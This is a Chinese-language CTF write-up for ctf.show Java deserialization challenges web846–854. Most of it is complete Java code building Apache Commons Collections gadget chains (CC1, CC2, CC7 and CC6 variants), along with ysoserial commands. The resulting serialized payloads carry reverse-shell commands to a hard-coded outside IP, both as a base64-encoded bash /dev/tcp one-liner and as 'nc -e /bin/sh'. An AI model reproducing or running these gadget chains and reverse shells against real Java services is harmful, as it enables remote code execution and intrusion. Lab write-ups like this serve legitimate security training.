反弹shell问题
web846(URLDNS)
java -jar ysoserial-all.jar URLDNS [http://e861ea18-56c2-48fb-96c8-52b488d55710.challenge.ctf.show|base64](http://e861ea18-56c2-48fb-96c8-52b488d55710.challenge.ctf.show|base64)
把得到的BASE64传入即可,在虚拟机里用,windows不能base64
web847
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671781322014-28df7ded-c06d-4d2a-aad5-0741644c8571.png#averageHue=%23f4f2f0&clientId=ua957003d-8ca4-4&from=paste&height=163&id=u9a26a82f&name=image.png&originHeight=204&originWidth=776&originalType=binary&ratio=1&rotation=0&showTitle=false&size=21704&status=done&style=none&taskId=uae3c3d41-680b-4467-ac4d-f67d22b8887&title=&width=620.8)
使用CC1,CC6,CC7等等都可以,我选择用自己构造的payload,不用ysoserial,虽然都差不多
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69
| import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.TransformedMap; import sun.misc.BASE64Decoder; import sun.misc.BASE64Encoder;
import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.lang.reflect.Method; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.HashMap; import java.util.Map;
public class CC1 { public static void main(String[] args) throws Exception { Transformer[] transformers=new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), new InvokerTransformer("exec",new Class[]{String.class},new Object[]{" bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object,Object> map=new HashMap<>(); map.put("value","aaa"); Map<Object,Object> transformedmap = TransformedMap.decorate(map, null, chainedTransformer); Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor annotationconstructor = c.getDeclaredConstructor(Class.class, Map.class); annotationconstructor.setAccessible(true); Object o = annotationconstructor.newInstance(Target.class, transformedmap);
serialize(o); String res=encryptToBase64("ser.bin"); System.out.println(res);
} public static void serialize(Object obj) throws Exception { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String filename) throws Exception { ObjectInputStream ois=new ObjectInputStream(new FileInputStream(filename)); Object obj=ois.readObject(); return obj; } public static String encryptToBase64(String filePath) { if (filePath == null) { return null; } try { byte[] b = Files.readAllBytes(Paths.get(filePath)); return Base64.getEncoder().encodeToString(b); } catch (IOException e) { e.printStackTrace(); }
return null; }
}
|
将生成的payload传递进去URL编码一次即可:
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671781422134-baeb69bb-680d-4a5d-8e5d-8e30f2ede3d2.png#averageHue=%230a0706&clientId=ua957003d-8ca4-4&from=paste&height=141&id=ub034edc3&name=image.png&originHeight=176&originWidth=829&originalType=binary&ratio=1&rotation=0&showTitle=false&size=16316&status=done&style=none&taskId=u598b8185-f605-4235-a6a8-68a9204597d&title=&width=663.2)
web848
使用Ysoserial的CC1即可,或者使用别的不包含TransformerMap的链子也可以,因为题目不让用嘛
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70
| import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.TransformedMap;
import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.HashMap; import java.util.Map;
public class CC1test { public static void main(String[] args) throws Exception { Transformer[] transformers=new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object,Object> map=new HashMap<>(); Map<Object,Object> lazymap = LazyMap.decorate(map,chainedTransformer); Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor annotationconstructor = c.getDeclaredConstructor(Class.class, Map.class); annotationconstructor.setAccessible(true); InvocationHandler handler = (InvocationHandler) annotationconstructor.newInstance(Override.class, lazymap); Map mapproxy= (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),new Class[]{Map.class},handler); Object o = annotationconstructor.newInstance(Override.class, mapproxy);
serialize(o); String res=encryptToBase64("ser.bin"); System.out.println(res);
} public static void serialize(Object obj) throws Exception { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String filename) throws Exception { ObjectInputStream ois=new ObjectInputStream(new FileInputStream(filename)); Object obj=ois.readObject(); return obj; } public static String encryptToBase64(String filePath) { if (filePath == null) { return null; } try { byte[] b = Files.readAllBytes(Paths.get(filePath)); return Base64.getEncoder().encodeToString(b); } catch (IOException e) { e.printStackTrace(); }
return null; } }
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671860902107-364b5526-3df5-4251-868d-2ad2c365c6e5.png#averageHue=%23262524&clientId=uae124d76-c268-4&from=paste&height=106&id=u22095dbd&name=image.png&originHeight=132&originWidth=553&originalType=binary&ratio=1&rotation=0&showTitle=false&size=7862&status=done&style=none&taskId=u81948ac5-991c-4fc2-90e0-4d7324120c7&title=&width=442.4)
web849
这边依赖换成了CC4,能使用的只有CC2和CC4了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68
| import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64;
import java.util.PriorityQueue;
public class CC2 { public static void main(String[] args) throws Exception { TemplatesImpl templates=new TemplatesImpl(); Class c= TemplatesImpl.class; Field name = c.getDeclaredField("_name"); name.setAccessible(true); name.set(templates,"Boogipop"); Field bytecodes = c.getDeclaredField("_bytecodes"); bytecodes.setAccessible(true); byte[] code= Files.readAllBytes(Paths.get("E:\\\\CTF学习笔记\\\\Java\\\\CC1-NEW\\\\target\\\\classes\\\\EXEC.class")); byte[][] codes={code}; bytecodes.set(templates,codes);
InvokerTransformer invokerTransformer=new InvokerTransformer("newTransformer",new Class[]{},new Object[]{}); TransformingComparator transformingComparator=new TransformingComparator(new ConstantTransformer(1)); PriorityQueue priorityQueue=new PriorityQueue(transformingComparator); priorityQueue.add(templates); priorityQueue.add(2); Class tc=transformingComparator.getClass(); Field comparator = tc.getDeclaredField("transformer"); comparator.setAccessible(true); comparator.set(transformingComparator,invokerTransformer); serialize(priorityQueue); String res=encryptToBase64("ser.bin"); System.out.println(res); } public static void serialize(Object obj) throws Exception { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String filename) throws Exception { ObjectInputStream ois=new ObjectInputStream(new FileInputStream(filename)); Object obj=ois.readObject(); return obj; } public static String encryptToBase64(String filePath) { if (filePath == null) { return null; } try { byte[] b = Files.readAllBytes(Paths.get(filePath)); return Base64.getEncoder().encodeToString(b); } catch (IOException e) { e.printStackTrace(); }
return null; } }
|
这里我选择了CC2,题目提示装了nc,那就用nc反弹shell即可
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671861562236-79e7b395-e156-4d9a-bf9d-f74b23c79657.png#averageHue=%23343433&clientId=u3b7e5ca9-8bbc-4&from=paste&height=103&id=u52faa3a8&name=image.png&originHeight=129&originWidth=605&originalType=binary&ratio=1&rotation=0&showTitle=false&size=5165&status=done&style=none&taskId=u84e2aa13-66e5-4708-a45d-3733227f97c&title=&width=484)
web850
CC3链
java -jar ysoserial-all.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"|base64
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671862726418-ffa70db3-2bb3-43ec-a49d-5575f8b5bf5d.png#averageHue=%231d1b1a&clientId=u3b7e5ca9-8bbc-4&from=paste&height=113&id=u3eeb4d85&name=image.png&originHeight=141&originWidth=501&originalType=binary&ratio=1&rotation=0&showTitle=false&size=10067&status=done&style=none&taskId=ue6b4079a-4698-4765-977f-ce83ccd09da&title=&width=400.8)
web851
题目提示有nc,用的是cc4库,并且做了一些bypass?
基于CC7更改出的野链
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84
| import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections4.map.DefaultedMap;
import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.*;
public class CC7 { public static void main(String[] args) throws Exception { Transformer transformerChain = new ChainedTransformer(new Transformer[]{}); Transformer[] transformers=new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"nc 43.140.251.169 7000 -e /bin/sh"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); Map innerMap1 = new HashMap(); Map innerMap2 = new HashMap();
Class<DefaultedMap> d = DefaultedMap.class; Constructor<DefaultedMap> declaredConstructor = d.getDeclaredConstructor(Map.class, Transformer.class); declaredConstructor.setAccessible(true); DefaultedMap defaultedMap1 = declaredConstructor.newInstance(innerMap1, transformerChain); DefaultedMap defaultedMap2 = declaredConstructor.newInstance(innerMap2, transformerChain); defaultedMap1.put("yy",1); defaultedMap2.put("zZ",1);
Hashtable hashtable = new Hashtable(); hashtable.put(defaultedMap1, 1); hashtable.put(defaultedMap2, 2);
Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers"); iTransformers.setAccessible(true); iTransformers.set(transformerChain,transformers);
defaultedMap2.remove("yy"); serialize(hashtable);
String res=encryptToBase64("ser.bin"); System.out.println(res); } public static void serialize(Object obj) throws Exception { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String filename) throws Exception { ObjectInputStream ois=new ObjectInputStream(new FileInputStream(filename)); Object obj=ois.readObject(); return obj; } public static String encryptToBase64(String filePath) { if (filePath == null) { return null; } try { byte[] b = Files.readAllBytes(Paths.get(filePath)); return Base64.getEncoder().encodeToString(b); } catch (IOException e) { e.printStackTrace(); }
return null; } }
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671873045601-4a34db9d-9e54-41f2-96c5-a99517483f63.png#averageHue=%230b0a0a&clientId=u7206f967-9d13-4&from=paste&height=74&id=u0e556ddf&name=image.png&originHeight=92&originWidth=572&originalType=binary&ratio=1&rotation=0&showTitle=false&size=3989&status=done&style=none&taskId=u78a2c943-284a-4263-ad21-36c0ea0f822&title=&width=457.6)
web852
同上
Web853
同上
Web854
自造野链CC6+CC4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72
| import org.apache.commons.collections4.keyvalue.TiedMapEntry; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections4.map.DefaultedMap;
import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.*;
public class Web854 { public static void main(String[] args) throws Exception { Transformer transformerChain = new ChainedTransformer(new Transformer[]{}); Transformer[] transformers=new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"nc 43.140.251.169 7000 -e /bin/sh"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); Map innerMap1 = new HashMap(); HashMap<Object,Object> map=new HashMap<>(); Class<DefaultedMap> d = DefaultedMap.class; Constructor<DefaultedMap> declaredConstructor = d.getDeclaredConstructor(Map.class, Transformer.class); declaredConstructor.setAccessible(true); DefaultedMap defaultedMap = declaredConstructor.newInstance(innerMap1, transformerChain); TiedMapEntry tiedMapEntry=new TiedMapEntry(defaultedMap, "aaa"); HashMap<Object, Object> hashMap=new HashMap<>(); hashMap.put(tiedMapEntry,"bbb"); map.remove("aaa");
Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers"); iTransformers.setAccessible(true); iTransformers.set(transformerChain,transformers);
serialize(hashMap);
String res=encryptToBase64("ser.bin"); System.out.println(res); } public static void serialize(Object obj) throws Exception { ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin")); oos.writeObject(obj); } public static Object unserialize(String filename) throws Exception { ObjectInputStream ois=new ObjectInputStream(new FileInputStream(filename)); Object obj=ois.readObject(); return obj; } public static String encryptToBase64(String filePath) { if (filePath == null) { return null; } try { byte[] b = Files.readAllBytes(Paths.get(filePath)); return Base64.getEncoder().encodeToString(b); } catch (IOException e) { e.printStackTrace(); }
return null; } }
|
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671874718003-eb499e9c-9607-4318-9414-e1a2a67640ff.png#averageHue=%23121110&clientId=ud42bb3b8-76e4-4&from=paste&height=64&id=u24a44207&name=image.png&originHeight=80&originWidth=600&originalType=binary&ratio=1&rotation=0&showTitle=false&size=4310&status=done&style=none&taskId=u131c3308-99f0-491d-bda7-1f2e57893e5&title=&width=480)